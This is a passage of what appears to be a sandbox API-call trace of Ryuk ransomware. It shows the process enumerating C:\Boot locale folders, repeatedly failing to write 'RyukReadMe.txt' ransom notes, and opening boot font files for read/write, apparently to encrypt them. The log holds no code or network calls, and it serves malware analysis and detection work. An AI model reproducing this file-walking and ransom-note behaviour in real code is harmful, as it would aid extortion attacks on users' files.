lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0131.474] SetLastError (dwErrCode=0x0) [0131.474] CreateFileW (lpFileName="C:\\Boot\\RyukReadMe.txt" (normalized: "c:\\boot\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.474] GetLastError () returned 0x5 [0131.474] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0131.474] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.474] FindFirstFileW (in: lpFileName="C:\\Boot\\es-ES\\*.*", lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0x3c3ef0 [0131.475] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0131.475] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0131.475] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0 [0131.475] FindClose (in: hFindFile=0x3c3ef0 | out: hFindFile=0x3c3ef0) returned 1 [0131.475] SetLastError (dwErrCode=0x0) [0131.475] CreateFileW (lpFileName="C:\\Boot\\es-ES\\RyukReadMe.txt" (normalized: "c:\\boot\\es-es\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.475] GetLastError () returned 0x5 [0131.475] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0131.475] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.475] FindNextFileW (in: hFindFile=0x3c7120, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0131.475] SetLastError (dwErrCode=0x0) [0131.475] CreateFileW (lpFileName="C:\\Boot\\RyukReadMe.txt" (normalized: "c:\\boot\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.475] GetLastError () returned 0x5 [0131.475] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0131.475] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.481] FindFirstFileW (in: lpFileName="C:\\Boot\\fi-FI\\*.*", lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0x3c3ef0 [0131.481] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0131.481] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0131.481] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0 [0131.481] FindClose (in: hFindFile=0x3c3ef0 | out: hFindFile=0x3c3ef0) returned 1 [0131.481] SetLastError (dwErrCode=0x0) [0131.482] CreateFileW (lpFileName="C:\\Boot\\fi-FI\\RyukReadMe.txt" (normalized: "c:\\boot\\fi-fi\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.482] GetLastError () returned 0x5 [0131.482] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0131.482] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.482] FindNextFileW (in: hFindFile=0x3c7120, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0131.482] SetLastError (dwErrCode=0x0) [0131.482] CreateFileW (lpFileName="C:\\Boot\\RyukReadMe.txt" (normalized: "c:\\boot\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.482] GetLastError () returned 0x5 [0131.482] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0131.482] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.482] FindFirstFileW (in: lpFileName="C:\\Boot\\Fonts\\*.*", lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0x3c3ef0 [0131.483] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0131.483] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0131.483] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.483] SetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\chs_boot.ttf", dwFileAttributes=0x80) returned 0 [0131.483] CreateFileW (lpFileName="C:\\Boot\\Fonts\\chs_boot.ttf" (normalized: "c:\\boot\\fonts\\chs_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.483] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.484] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.484] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0131.484] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.484] SetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\cht_boot.ttf", dwFileAttributes=0x80) returned 0 [0131.485] CreateFileW (lpFileName="C:\\Boot\\Fonts\\cht_boot.ttf" (normalized: "c:\\boot\\fonts\\cht_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.485] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.485] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.485] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0131.485] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.485] SetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\jpn_boot.ttf", dwFileAttributes=0x80) returned 0 [0131.486] CreateFileW (lpFileName="C:\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.486] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.486] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.486] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0131.486] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.486] SetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\kor_boot.ttf", dwFileAttributes=0x80) returned 0 [0131.486] CreateFileW (lpFileName="C:\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.486] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.486] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.486] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0131.486] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.487] SetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\wgl4_boot.ttf", dwFileAttributes=0x80) returned 0 [0131.487] CreateFileW (lpFileName="C:\\Boot\\Fonts\\wgl4_boot.ttf" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.487] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.487] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.487] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0 [0131.487] FindClose (in: hFindFile=0x3c3ef0 | out: hFindFile=0x3c3ef0) returned 1 [0131.487] SetLastError (dwErrCode=0x0) [0131.488] CreateFileW (lpFileName="C:\\Boot\\Fonts\\RyukReadMe.txt" (normalized: "c:\\boot\\fonts\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.488] GetLastError () returned 0x5 [0131.488] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0131.488] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.488] FindNextFileW (in: hFindFile=0x3c7120, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0131.488] SetLastError (dwErrCode=0x0) [0131.488] CreateFileW (lpFileName="C:\\Boot\\RyukReadMe.txt" (normalized: "c:\\boot\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.488] GetLastError () returned 0x5 [0131.488] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0131.488] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.488] FindFirstFileW (in: lpFileName="C:\\Boot\\fr-FR\\*.*", lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0x3c3ef0 [0131.489] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0131.489] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0131.489] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0 [0131.489] FindClose (in: hFindFile=0x3c3ef0 | out: hFindFile=0x3c3ef0) returned 1 [0131.489] SetLastError (dwErrCode=0x0) [0131.489] CreateFileW (lpFileName="C:\\Boot\\fr-FR\\RyukReadMe.txt" (normalized: "c:\\boot\\fr-fr\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.489] GetLastError () returned 0x5 [0131.489] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0131.489] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.489] FindNextFileW (in: hFindFile=0x3c7120, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0131.489] SetLastError (dwErrCode=0x0) [0131.489] CreateFileW (lpFileName="C:\\Boot\\RyukReadMe.txt" (normalized: "c:\\boot\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.489] GetLastError () returned 0x5 [0131.490] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0131.490] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.490] FindFirstFileW (in: lpFileName="C:\\Boot\\hu-HU\\*.*", lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0x3c3ef0 [0131.490] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0131.490] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0131.490] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0 [0131.490] FindClose (in: hFindFile=0x3c3ef0 | out: hFindFile=0x3c3ef0) returned 1 [0131.490] SetLastError (dwErrCode=0x0) [0131.490] CreateFileW (lpFileName="C:\\Boot\\hu-HU\\RyukReadMe.txt" (normalized: "c:\\boot\\hu-hu\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.490] GetLastError () returned 0x5 [0131.490] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0131.490] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.490] FindNextFileW (in: hFindFile=0x3c7120, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0131.490] SetLastError (dwErrCode=0x0) [0131.490] CreateFileW (lpFileName="C:\\Boot\\RyukReadMe.txt" (normalized: "c:\\boot\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.490] GetLastError () returned 0x5 [0131.490] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0131.491] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.491] FindFirstFileW (in: lpFileName="C:\\Boot\\it-IT\\*.*", lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0x3c3ef0 [0131.492] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0131.492] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0131.492] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0 [0131.492] FindClose (in: hFindFile=0x3c3ef0 | out: hFindFile=0x3c3ef0) returned 1 [0131.492] SetLastError (dwErrCode=0x0) [0131.492] CreateFileW (lpFileName="C:\\Boot\\it-IT\\RyukReadMe.txt" (normalized: "c:\\boot\\it-it\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.492] GetLastError () returned 0x5 [0131.492] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0131.492] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.492] FindNextFileW (in: hFindFile=0x3c7120, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0131.492] SetLastError (dwErrCode=0x0) [0131.492] CreateFileW (lpFileName="C:\\Boot\\RyukReadMe.txt" (normalized: "c:\\boot\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.493] GetLastError () returned 0x5 [0131.493] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0131.493] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.493] FindFirstFileW (in: lpFileName="C:\\Boot\\ja-JP\\*.*", lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0x3c3ef0 [0131.493] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0131.493] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0131.493] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0 [0131.493] FindClose (in: hFindFile=0x3c3ef0 | out: hFindFile=0x3c3ef0) returned 1 [0131.493] SetLastError (dwErrCode=0x0) [0131.493] CreateFileW (lpFileName="C:\\Boot\\ja-JP\\RyukReadMe.txt" (normalized: "c:\\boot\\ja-jp\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.493] GetLastError () returned 0x5 [0131.493] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0131.493] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.493] FindNextFileW (in: hFindFile=0x3c7120, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0131.494] SetLastError (dwErrCode=0x0) [0131.494] CreateFileW (lpFileName="C:\\Boot\\RyukReadMe.txt" (normalized: "c:\\boot\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.494] GetLastError () returned 0x5 [0131.494] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0131.494] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.494] FindFirstFileW (in: lpFileName="C:\\Boot\\ko-KR\\*.*", lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0x3c3ef0 [0131.494] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0131.494] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0131.494] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0 [0131.495] FindClose (in: hFindFile=0x3c3ef0 | out: hFindFile=0x3c3ef0) returned 1 [0131.495] SetLastError (dwErrCode=0x0) [0131.495] CreateFileW (lpFileName="C:\\Boot\\ko-KR\\RyukReadMe.txt" (normalized: "c:\\boot\\ko-kr\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.495] GetLastError () returned 0x5 [0131.495] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0131.495] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.495] FindNextFileW (in: hFindFile=0x3c7120, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0131.495] FindNextFileW (in: hFindFile=0x3c7120, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0131.495] SetLastError (dwErrCode=0x0) [0131.495] CreateFileW (lpFileName="C:\\Boot\\RyukReadMe.txt" (normalized: "c:\\boot\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.495] GetLastError () returned 0x5 [0131.495] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0131.495] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.495] FindFirstFileW (in: lpFileName="C:\\Boot\\nb-NO\\*.*", lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0x3c3ef0 [0131.495] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0131.495] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0131.495] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0 [0131.495] FindClose (in: hFindFile=0x3c3ef0 | out: hFindFile=0x3c3ef0) returned 1 [0131.495] SetLastError (dwErrCode=0x0) [0131.496] CreateFileW (lpFileName="C:\\Boot\\nb-NO\\RyukReadMe.txt" (normalized: "c:\\boot\\nb-no\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.496] GetLastError () returned 0x5 [0131.496] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0131.496] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.496] FindNextFileW (in: hFindFile=0x3c7120, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0131.496] SetLastError (dwErrCode=0x0) [0131.496] CreateFileW (lpFileName="C:\\Boot\\RyukReadMe.txt" (normalized: "c:\\boot\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.496] GetLastError () returned 0x5 [0131.496] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0131.496] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.496] FindFirstFileW (in: lpFileName="C:\\Boot\\nl-NL\\*.*", lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0x3c3ef0 [0131.497] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0131.497] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0131.497] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0 [0131.497] FindClose (in: hFindFile=0x3c3ef0 | out: hFindFile=0x3c3ef0) returned 1 [0131.497] SetLastError (dwErrCode=0x0) [0131.497] CreateFileW (lpFileName="C:\\Boot\\nl-NL\\RyukReadMe.txt" (normalized: "c:\\boot\\nl-nl\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.497] GetLastError () returned 0x5 [0131.497] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0131.497] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.497] FindNextFileW (in: hFindFile=0x3c7120, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0131.497] SetLastError (dwErrCode=0x0) [0131.497] CreateFileW (lpFileName="C:\\Boot\\RyukReadMe.txt" (normalized: "c:\\boot\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.498] GetLastError () returned 0x5 [0131.498] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0131.498] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.498] FindFirstFileW (in: lpFileName="C:\\Boot\\pl-PL\\*.*", lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0x3c3ef0 [0131.498] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0131.498] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0131.498] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0 [0131.498] FindClose (in: hFindFile=0x3c3ef0 | out: hFindFile=0x3c3ef0) returned 1 [0131.498] SetLastError (dwErrCode=0x0) [0131.498] 